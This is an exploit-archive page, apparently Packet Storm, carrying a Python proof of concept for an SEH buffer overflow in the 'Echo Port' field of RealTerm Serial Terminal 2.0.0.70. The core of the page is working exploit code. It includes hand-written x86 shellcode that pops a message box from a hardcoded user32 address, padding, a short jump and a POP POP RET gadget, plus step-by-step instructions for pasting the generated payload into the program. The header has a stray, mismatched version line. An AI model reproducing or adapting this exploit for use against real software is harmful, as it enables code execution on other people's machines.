RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow: Posted Feb 21, 2019; Authored by Matteo Malvica; RealTerm Serial Terminal version 2.0.0.70 suffers from an echo port buffer overflow vulnerability.; tags | exploit, overflow; SHA-256 | 801b86d255328b3fedc995c0bcbbcc29d2ca3f7b6e8522ecf7a4d5babd746c01; Download | Favorite | View

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) 
# Date: 21.02.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/ 
# Version: 2.0.0.70
# Category: Local
# Contact: https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# Originail PoC https://www.exploit-db.com/exploits/46391

# 1.- Run the python script  it will create a new file "carbonara.txt"
# 2.- Copy the content of the new file 'carbonara.txt' to clipboard
# 3.- Open realterm.exe 
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or 
# 8.- Box!


import socket
import struct

'''
badchars: 0x20,0x0a
arwin.exe user32.dll MessageBoxA
arwin - win32 address resolution program - by steve hanna - v.01
MessageBoxA is located at 0x747cfdae in user32.dll
'''
shellcode = (
"\x33\xc0"                          # XOR EAX,EAX
"\x50"                              # PUSH EAX      => padding for lpCaption
"\x68\x7a\x6f\x21\x21"              # PUSH "zo!!"
"\x68\x61\x76\x61\x6e"              # PUSH "avan"
"\x8B\xCC"                          # MOV ECX,ESP   => PTR to lpCaption
"\x50"                              # PUSH EAX      => padding for lpText
"\x68\x6e\x7a\x6f\x21"              # PUSH "nzo!"
"\x68\x61\x76\x61\x21"              # PUSH "ava!"
"\x8B\xD4"                          # MOV EDX,ESP   => PTR to lpText
"\x50"                              # PUSH EAX - uType=0x0
"\x51"                              # PUSH ECX - lpCaption
"\x52"                              # PUSH EDX - lpText
"\x50"                              # PUSH EAX - hWnd=0x0
"\xBE\xae\xfd\x7c\x74"              # MOV ESI,USER32.MessageBoxA <<< hardcoded address
"\xFF\xD6")                         # CALL ESI

pad1="\x90"*(142-len(shellcode))
pad2 = "\x42" * 118
nseh = "\xEB\x80\x90\x90"
jmp_back = "\xEB\x80\x90\x90"
short_jmp = "\xEB\x12\x90\x90"
seh =  struct.pack('<L',0x00406e27)  # 00406e27# POP POP RET
nops = "\x90\x90\x90\x90"
payload = pad1  + shellcode + nops + jmp_back + pad2 + nseh + seh 


try:
        f=open("carbonara.txt","w")
        print "[+] Creating %s bytes pasta payload.." %len(payload)
        f.write(payload)
        f.close()
        print "[+] Carbonara created!"

except:
        print "Carbonara cannot be created"

Top Authors In Last 30 Days

Red Hat 228 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 65 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

Share This

RealTerm Serial Terminal 2.0.0.70 Echo Port Buffer Overflow

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems